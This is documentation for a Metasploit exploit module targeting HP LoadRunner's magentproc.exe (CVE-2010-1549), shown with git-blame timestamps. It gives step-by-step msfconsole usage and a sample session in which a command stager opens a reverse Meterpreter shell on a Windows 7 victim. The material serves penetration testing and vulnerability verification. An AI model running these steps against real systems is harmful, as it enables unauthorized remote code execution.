2020-01-28 14:28:18 -05:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2017-11-09 03:59:18 +11:00
|
|
|
HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
|
|
|
|
|
|
2020-01-28 14:28:18 -05:00
|
|
|
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
|
|
|
|
|
HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
|
2017-12-29 16:30:32 -05:00
|
|
|
The service is vulnerable provided the Secure Channel feature is disabled (default).
|
2017-11-09 03:59:18 +11:00
|
|
|
|
2017-12-29 16:30:32 -05:00
|
|
|
During testing, additional versions were verified to be vulnerable. The following list documents them:
|
|
|
|
|
|
|
|
|
|
- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
|
2017-11-09 03:59:18 +11:00
|
|
|
|
2017-12-29 16:30:32 -05:00
|
|
|
HP LoadRunner 9.50 or below, or a version documented above.
|
2017-11-09 03:59:18 +11:00
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the application
|
|
|
|
|
2. Start msfconsole
|
|
|
|
|
3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
|
2017-12-29 16:30:32 -05:00
|
|
|
4. Do: ```set RHOST [ip]```
|
2017-11-09 03:59:18 +11:00
|
|
|
5. Do: ```run```
|
|
|
|
|
6. You should get a shell.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
2017-12-29 16:30:32 -05:00
|
|
|
### Win7 OS with HP LoadRunner 12.53 Community Edition
|
2017-11-09 03:59:18 +11:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
|
|
|
|
|
msf exploit(hp_loadrunner_magentproc_cmdexec) > set RHOST victim
|
|
|
|
|
RHOST => victim
|
|
|
|
|
msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
|
|
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
|
|
|
|
[*] victim:54345 - Sending payload...
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 1.47% done (1499/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 2.93% done (2998/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
|
2017-12-29 16:30:32 -05:00
|
|
|
...snip...
|
2017-11-09 03:59:18 +11:00
|
|
|
[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 96.72% done (98934/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 98.15% done (100400/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 99.55% done (101827/102292 bytes)
|
|
|
|
|
[*] victim:54345 - Command Stager progress - 100.00% done (102292/102292 bytes)
|
|
|
|
|
[*] Sending stage (179267 bytes) to 2.2.2.2
|
|
|
|
|
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55556) at 2017-11-09 03:53:08 +1100
|
|
|
|
|
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : TARGET
|
|
|
|
|
OS : Windows 7 (Build 7601, Service Pack 1).
|
|
|
|
|
Architecture : x64
|
|
|
|
|
System Language : en_AU
|
|
|
|
|
Domain : DOMAIN
|
|
|
|
|
Logged On Users : 3
|
|
|
|
|
Meterpreter : x86/windows
|
|
|
|
|
meterpreter >
|
|
|
|
|
Background session 1? [y/N]
|
|
|
|
|
|
|
|
|
|
```
|
